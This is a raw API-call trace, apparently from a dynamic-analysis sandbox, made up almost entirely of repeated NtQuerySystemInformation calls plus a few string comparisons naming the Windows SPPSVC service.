NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x20, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x40, ResultLength=0x0) [0227.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0227.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0227.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0227.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd418, Length=0x30, ResultLength=0x0) [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x38, ResultLength=0x0) [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.959] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0227.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0227.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0227.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0227.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0227.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0227.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0227.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd418, Length=0x30, ResultLength=0x0) [0227.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x38, ResultLength=0x0) [0227.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.972] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0227.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.982] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0227.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 